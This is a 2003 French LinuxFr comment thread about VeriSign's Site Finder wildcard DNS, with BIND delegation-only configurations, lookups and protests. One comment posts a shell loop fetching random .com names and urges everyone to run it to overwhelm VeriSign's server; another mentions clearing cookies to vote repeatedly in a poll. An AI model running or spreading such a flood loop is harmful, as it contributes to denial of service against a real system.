  `.com' et `.net' étant les TLD controllés et pollués par Verisign.
  
  $ host www.byebye-verisign.com Host www.byebye-verisign.com not found: 3(NXDOMAIN)
  - [^] # Re: VeriSign n'est pas le seul
    
    Posté par Prosper le 17 septembre 2003 à 17:49. Évalué à 4.
    
    tu peux y rajouter :
    
    zone "ac" { type delegation-only; };
    zone "cc" { type delegation-only; };
    zone "cx" { type delegation-only; };
    zone "museum" { type delegation-only; };
    zone "nu" { type delegation-only; };
    zone "ph" { type delegation-only; };
    zone "sh" { type delegation-only; };
    zone "tm" { type delegation-only; };
    zone "ws" { type delegation-only; };
# Pourquoi tant de haine?

Posté par Sylvain Briole (site web personnel) le 17 septembre 2003 à 14:26. Évalué à 1.

<mode nième degré>
Je viens de lire les contributions "haineuses" à l'égard de Verisign.
Ils sont pourtant "cools", ils utilisent Linux ;-) :

http://www.verisign.com/offer/redhat/(...)
http://www.redhat.com/about/presscenter/2003/press_verisign.html(...)
</mode nième degré>

Bon, OK, je sors ;-)
- [^] # Re: Pourquoi tant de haine?
 
 Posté par Obsidian le 21 septembre 2003 à 14:34. Évalué à 1.
 
 T'imagine un serveur Windows tenir la charge qu'ils reçoivent ?
 
 Ok coup bas. D'ailleurs il fait super beau aujourd'hui -->[].
# Solution technique : configurer BIND

Posté par yoho (site web personnel) le 17 septembre 2003 à 15:05. Évalué à 1.

Au lieu de reconfigurer iptables ou ses routes, on peut pas reconfigurer bind (c'est moins douloureux) ?

Par exemple, ne peut -on pas virer le root server que représente Verisign de son fichier "hint" ?

Autre idée : peut-on déclarer son BIND authorithative pour .com et .net et recréer son propre root server en ignorant tous les updates de zone qui contiennent 64.94.110.11 ?
- [^] # Re: Solution technique : configurer BIND
  
  Posté par ramzez le 17 septembre 2003 à 15:57. Évalué à 1.
  
  verysign, c'est le maitre des .com et .net
  si tu ne tiens pas compte de leur update, tu passeras à coté des nouveaux domaines en .com et .net, et tu ne verras pas les modifs d'ip des domaines qui en changent
  
  pour bind il semblerait y avoir un patch, certains en parlent plus haut
# VeriSign, désormais l'un des meillers referers de Framasoft !

Posté par Alexis Kauffmann (site web personnel, Mastodon) le 17 septembre 2003 à 15:54. Évalué à 4.

Chez nous à framasoft.net en tout cas, on en voit tout de suite les effets.

Voici l'un de nos nouveaux referers :-(

http://sitefinder.verisign.com/lpc?url=www.framasoft.com&host=w(...)

On s'en serait bien passé...
- [^] # Re: VeriSign, désormais l'un des meillers referers de Framasoft !
  
  Posté par Boa Treize (site web personnel) le 17 septembre 2003 à 16:06. Évalué à 1.
  
  Vous en avez beaucoup ?
  - [^] # Re: VeriSign, désormais l'un des meillers referers de Framasoft !
    
    Posté par butterfly le 17 septembre 2003 à 16:13. Évalué à 1.
    
    non pas encore !
  - [^] # Re: VeriSign, désormais l'un des meillers referers de Framasoft !
    
    Posté par Alexis Kauffmann (site web personnel, Mastodon) le 18 septembre 2003 à 01:31. Évalué à 2.
    
    hier 34 !
# Verisign va récuperer toutes les attaques...

Posté par David Bober (site web personnel) le 17 septembre 2003 à 17:35. Évalué à 2.

www.windowsupdate.com ne pointais vers nul part il y a encore une semaine a cause du virus Blaster (maintenant moins actif), et ce n'est qu'un exemple.

Toutes les attaques vers des hosts qui aurront retiré leurs entrée A seront dirigés vers le(s) serveurs de Verisign.

Ils ont une grande bande passante mais juste a cause de ces attaques ça va faire mal...

PS : sur une de mes machines, si un domaine ne peut pas etre atteind, un message apparait pour essayer d'utiliser la connexion de backup (56k), et j'ai eu pas mal des ces messages :-/
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par qaghan le 17 septembre 2003 à 17:38. Évalué à 1.

Je viens de retrouver une classique page d'erreur pour les hotes domaines inconnus. Est-ce mon fournisseur d'acces ou VeriSign ?
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par Olivier BENDRIES (site web personnel) le 17 septembre 2003 à 19:26. Évalué à 1.
  
  sur quelle adresse ?
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par maston28 le 17 septembre 2003 à 17:44. Évalué à 1.

voila une astuce qui vaut ce qu'elle vaut pour résoudre partiellement le problème...
http://lea-linux.org/trucs/?aff_item=407(...)
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par plagiats le 17 septembre 2003 à 18:45. Évalué à 1.
  
  Bonjour,
  
  En quoi cette astuce aide t elle svp ?
  Elle fait référence à des sous domaines donc blabla.mondomainequejetappecorrectementetquidoncenvoipassurverisign.com ...
  
  Est ce pour renvoyer tout le monde sur
  mondomainequejetappecorrectementetquidoncenvoipassurverisign.com
  si "blabla" n'existe pas ?
  
  auquel cas, je comprend en quoi ca aide UN PEU mais ca ne résoud pas le probleme.
  
  voilà.
# contrôle d'internet

Posté par V le 17 septembre 2003 à 18:51. Évalué à 2.

Le problème, c'est surtout de confier ça à des sociétés privés comme Verisign...

Je ne crois pas qu'ils vont persister, c'est trop énorme, mais ils ont réussi à faire parler d'eux...

# la solution : utiliser ipv6 !

Posté par itipaw le 17 septembre 2003 à 19:39. Évalué à 2.



sauron% host -t A verisign-niquetamere.com 

verisign-niquetamere.com has address 64.94.110.11

sauron% host -t AAAA verisign-niquetamere.com

sauron% host -t A6 verisign-niquetamere.com  

sauron%

C'est vrai, y doit pas y avoir beacoup de pognon à se faire avec des pubs sur le 6bone ....

# Si le coeur vous en dis ....

Posté par CopainJack (site web personnel, Mastodon) le 17 septembre 2003 à 20:00. Évalué à 2.

Vous pouvez "moinssez" le CEO de VeriSign, Stratton D. Sclavos de son nom, sur le site de Forbes, à la question "Pensez-vous que ces pdg font du bon boulot dans leur boite ?"

http://www.forbes.com/2003/05/01/cx_ceointernetpoll.html(...)
(il est en avant derniere sur la page)

Au moment où j'ai voté, il avait 6% de oui pour le mois de septembre, il y a eu un effet slashdot (j'ai trouvé ce lien dans les commentaires de la news sur la réponse de ISC)
- [^] # Re: Si le coeur vous en dis ....
  
  Posté par ... a little wood elfe le 17 septembre 2003 à 20:45. Évalué à 1.
  
  A tant que faire votez moins aussi pour le pdg d'Amazone et sa politique de brevets ridicules.
- [^] # Re: Si le coeur vous en dis ....
  
  Posté par traboolix le 17 septembre 2003 à 21:00. Évalué à 1.
  
  Le plus rigolo c'est de pouvoir moinsser plusieurs fois a la suite en virant les cookies,vachement fiables leurs stats
- [^] # Re: Si le coeur vous en dis ....
  
  Posté par vazco le 17 septembre 2003 à 22:36. Évalué à 2.
  
  2226 no pour 126 yes... Bichette...
  
  C'est con, y'a pas le pédégé de SCO.
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par jeff110 le 17 septembre 2003 à 21:01. Évalué à 1.

Ca ne fonctionne pas chez moi avec MozillaFirebird (connection impossible), mais ca fonctionne ave avec win98 et konqueror.
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par M le 17 septembre 2003 à 21:52. Évalué à 2.

apparament free a mis un patch : desormais on a droit a un
ERROR 205 -- DNS name lookup failure. Please contact your system administrator.
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par charlieecho le 17 septembre 2003 à 23:05. Évalué à 1.

La meilleure réaction -et qqn l'a évoquée tout à l'heure- serait de faire savoir à Verisign qu'on est "opposés" à leurs conditions d'utilisation (Terms of Use).
Pratiquement, ça leur imposerait de ne pas rediriger les domaines vers leur page, si l'utilisateur à une IP de Wanadoo, Free, AOL ou d'autres.
Surtout pour AOL, d'ailleurs : a priori, pour bloquer AOL "France", ils sont obligés de bloquer tout AOL Monde (car AOL n'a jamais dit quelles IP étaient affectées à quelle région du monde).
Bref, simplement et légalement, on peut les obliger à créer une config énorme, et à restreindre le nombre de "chanceux" qui verront leur moteur de recherche.

L'unique hésitation qui me reste : en fait, Verisign a fait ça pour ne pas laisser le champ libre à Microsoft ; il n'est pas non plus normal que, en cas d'adresse erronée, Microsoft-search soit appelé (surtout qu'avec les Passeport et autres, Microsoft aura vite des infos très personnelles sur les goûts des internautes). Bref, on est pris entre Microsoft et Verisign... Et au fond, je préfère Verisign...
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par Gruik Man le 17 septembre 2003 à 23:46. Évalué à 6.
  
  La différence, c'est que personne n'est obligé d'utiliser la fonctionnalité de recherche d'IE (désactivable). Personne n'est obligé d'utiliser IE, même. D'ailleurs, personne n'est obligé d'utiliser un logiciel de Microsoft.
  Par contre, .com et .net, ça touche _tout le monde_.
  
  Entre un éditeur de logiciels qui ajoute une fonctionnalité de recherche à un de ses logiciels, et un (ir)responsable de l'infrastructure Internet qui détourne celle-ci à son profit, c'est quand même pas la même chose.
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par sebmil le 18 septembre 2003 à 00:14. Évalué à 1.
  
  La différence étant que microsoft ne piège que les utilisateurs d'IE qui n'ont pas eu l'idée de (ou la connaissance pour) désactiver la recherche automatique, alors que ver isign fait chier tout le monde...
  - [^] # Re: VeriSign détruit l'un des fondements d'Internet
    
    Posté par charlieecho le 18 septembre 2003 à 11:00. Évalué à 1.
    
    Les utilisateurs d'IE sont encore 95% des internautes (malheureusement) ; et la désactivation de la recherche automatique n'est pas aisée. Donc les personnes impactées par la recheche automatique sont à peu près les mêmes que celles impactées par la décision de VS.
    Jusqu'ici, je crois que MS n'a PAS mis de pub sur leur site de recherche automatique (ils n'ont certes pas besoin de ça pour vivre...).
    Il n'est pas certain que VS en mettra...
    
    Mais nous sommes d'accord : la décision de VS est scandaleuse, c'est un premier pas vers un détournement des protocoles à des fins privées.
    - [^] # Re: VeriSign détruit l'un des fondements d'Internet
      
      Posté par Jul (site web personnel) le 19 septembre 2003 à 23:40. Évalué à 3.
      
      95% des utilisateurs humains des noms de domaines utilisent IE et outlook, mais le problème c'est que cela perturbe les démons ; les serveurs antispams ne marchent plus sur les .com, les sendmails et postfix ne peuvent plus appliquer les règles antispam classique du style vérifier que l'IP correpsond au nom de domaine ....
      
      Internet et quand même basé sur des millions de démons qui eux sont dans les choux.
      Voilà le problème. C'est popur ça que les RBL sont inactives depuis 72heures, ce qui fait que les opérateurs (wanadoo, 9T, nerim) voient leur traffic de spam augmenter. verisign vient d'aider les pirates à provoquer le plus gros DDOS jamais vu. À quand une notification d'un juge à verisign pour complicité de cybercrime ?
# Écrivez à vos fournisseurs d'accès !

Posté par Lunar le 18 septembre 2003 à 00:42. Évalué à 2.

Voici ce que je viens d'envoyer aux root des fournisseurs d'accès que j'utilise (je vous invite à faire de même) :

Bonjour,

Comme vous pouvez le lire dans l'article paru sur LinuxFr [1], la société commercialle VeriSign a décidé de répondre positivement à toutes les requêtes sur des domaines en .com ou en .net n'existant pas.

Cet abus de leur position est extrêmement gênant pour plusieurs raisons (utilisation publicitaire, problème du filtrage du spam, impossibilité d'utiliser des MX secondaires, etc). Ce système permet surtout à VeriSign de collecter un grand nombre d'informations sur les utilisateurs du réseau à la moindre faute d'orthographe.

Serait-il possible que les serveurs DNS de nom du fournisseur d'accès soient corrigés afin qu'ils répondent correctement par une erreur ?

Merci d'avance,
Votre nom.

[1] http://linuxfr.org/2003/09/17/13947.html(...)
- [^] # Re: Écrivez à vos fournisseurs d'accès !
  
  Posté par vazco le 18 septembre 2003 à 01:05. Évalué à 2.
  
  Si vraiment tu tiens à donner des raisons (ce qui ne me semble pas indispensable), évite de parler de filtrage du spam et de MX secondaire. Je ne vois pas le rapport et ça ridiculise fortement un propos par ailleurs légitime.
  
  Mieux vaut se contenter de la surcharge de traffic (à charge du FAI, d'ailleurs), des délais de connexion, et du fait qu'un certain nombre de fonctionnalités logicielles sont rendues inopérantes.
  
  Mais la non-conformité de ce « service » ou le fait d'en refuser les conditions d'utilisation devrait suffir, amha.
  
  Les bons FAI ne devraient pas beaucoup se faire prier, amha. Ça permettra de faire un comparatif. ;-)
- [^] # Re: Écrivez à vos fournisseurs d'accès !
  
  Posté par Obsidian le 18 septembre 2003 à 02:04. Évalué à 2.
  
  afin qu'ils répondent correctement par une erreur ?
  
  Proposition pour le moins ironique :-)
  Peut-être faudrait-il changer un rien le style ?
- [^] # Re: Écrivez à vos fournisseurs d'accès !
  
  Posté par charlieecho le 18 septembre 2003 à 10:54. Évalué à 1.
  
  Comment le FAI sait-il qu'il qu'il faut "signaler une erreur" ???
  Si le FAI ne connaît pas le nom de domaine, il demande à Verisign ; et il se fie à la réponse de Verisign...
  
  Il faudrait que la DNS cherche à résoudre le nom, récupère la réponse, et qu'elle "comprenne" que la réponse est abusive de la part de Verisign...
  Bref, la DNS prendrait un rôle de filtre qui n'est pas le sien ; est-ce la meilleure solution ?
  On peut modifier nos fichiers hosts, nos DNS en local, mais on ne peut pas demander à un FAI de ne pas appliquer les protocoles DNS classiques... Reste en plus à résoudre le pb de récursion des DNS...
  - [^] # Re: Écrivez à vos fournisseurs d'accès !
    
    Posté par Lunar le 18 septembre 2003 à 13:07. Évalué à 1.
    
    Voir ce patch :
    http://www.isc.org/products/BIND/delegation-only.html(...)
    
    Il suffit de ne prendre en compte que les réponses de type RR (délégation) pour les domaines .net et .com. Cette modification est à faire sur tous les serveurs DNS.
# les inspirateurs de

Posté par Corton Aloxe le 18 septembre 2003 à 12:09. Évalué à 3.

après avoir essayé
http://verisign-c-est-des-voleurs.com(...)

essayez aussi :
http://lemuseeimmaginaire.museum(...)

http://on-se-retrouve-tout.nu(...)

a lire aussi (anglais) http://www.byte.org/archives/2003/05/21/on_the_use_of_consultation.(...)
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par vincent FILALI-ANSARY (site web personnel) le 18 septembre 2003 à 16:41. Évalué à 2.

ça est ! Le serveur verisign a explosé on lui as envoyé plein de petits avions en papiers.

comme quoi geant au pieds d'argile.

il ne répond plus.
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par Charles Plessy (site web personnel) le 19 septembre 2003 à 09:38. Évalué à 2.
  
  Ben ce matin ça marche impec dans de très bons délais :(
  
  => while true; do for i in `seq 0 9`; do wget -O /dev/null `head -c 30 /dev/urandom | perl -pe 's/[^a-zA-Z]//ig'`.com ; done ; echo -n.; sleep1; done
  
  (voir plus haut pour une version silencieuse. Moi j'ai mis le truc dans un screen).
  
  Si on s'y met tous, on peut y arriver. Et individuellement, comme la requête est pas bien méchante, je pense qu'on ne peut pas se faire accuser de DoS.
# VeriSign poursuivi :)

Posté par Francois Revol (site web personnel) le 19 septembre 2003 à 07:45. Évalué à 2.

http://slashdot.org/article.pl?sid=03/09/19/039214&mode=thread&(...)

VeriSign se prend un procès par un cybersquatteur :)
# ça y est !!

Posté par Olivier BENDRIES (site web personnel) le 19 septembre 2003 à 12:13. Évalué à 1.

SHAME !!! SHAME !! Le site portail de verisign, reponds maintenant aux urls en erreurs sans aucun problème. Personellement, j'ai jamais vu un portail aussi pourri, même sur les sites de pseudowarez.

"pon pon ponpon pon ponpon ponpon" (marche funébre )
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par Yves Dessertine le 19 septembre 2003 à 17:13. Évalué à 2.

Hey !?!? Ils ont remis la pétition à zéro ??
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par bituur_esztreym (site web personnel) le 19 septembre 2003 à 19:37. Évalué à 1.
  
  il semble bien oui,
  je viens de signer, je suis 179e :)
  où sont les 4000 cités plus haut ?
  - [^] # Re: VeriSign détruit l'un des fondements d'Internet
    
    Posté par marvin le 19 septembre 2003 à 19:44. Évalué à 1.
    
    C'est bloqué à 178 signatures :-/ ...
    - [^] # Re: VeriSign détruit l'un des fondements d'Internet
      
      Posté par m4k_pem le 19 septembre 2003 à 20:42. Évalué à 1.
      
      Il paraîtrait que c'est parce que le compteur était sur 16 bits signés, donc après 32768 -> remise à zéro :'(
      - [^] # Re: VeriSign détruit l'un des fondements d'Internet
        
        Posté par Yves Dessertine le 19 septembre 2003 à 21:06. Évalué à 1.
        
        Bizare, parce que le dernier chiffre que j'ai vu est d'environ 12000... Y'a encore du chemin jusqu'a 32768...
        
        Mais ils ont quand même pas perdu toutes ces signatures ?? Ce serait trop bête.
        
        D'ailleurs, j'espère que leur immonde Sitefinder disparaitra rapidement !
        
        [^] # Re: VeriSign détruit l'un des fondements d'Internet
        
        Posté par niclone (site web personnel) le 19 septembre 2003 à 22:34. Évalué à 1.
        
        Personnelement, je l'ai vu passer la barre des 10000 hier soir je crois, puis ce matin, il est passé a 7000 et des poussierres, puis, 3 ou 4 minutes après a 8700 je crois, et maintenant, je vois que c'est a 178, alors que bituur_esztreym dit qu'il vient de signer le 179eme ...
        
        [^] # Re: VeriSign détruit l'un des fondements d'Internet
        
        Posté par traboolix le 20 septembre 2003 à 00:38. Évalué à 1.
        
        où sont les 4000 cités plus haut ?
        
        En fait Verisign a invente la fausse petition en ligne.Les 4000 se trouvent sur leur serveur afin de leurs faire un mailing publicitaire.
        Pas bete ça,ils soulevent des protestations alors qu'ils ne recuperent que des url pourries,la petition en ligne reclame l'@ mail et ton nom (required of course) et ca part direct chez le marketeur.
        Comme tu es 179e tu feras partie du second paquet,pas trop decu ?
        
        Bon,Ok je --------------->[]

Suivre le flux des commentaires

Note : les commentaires appartiennent à celles et ceux qui les ont postés. Nous n’en sommes pas responsables.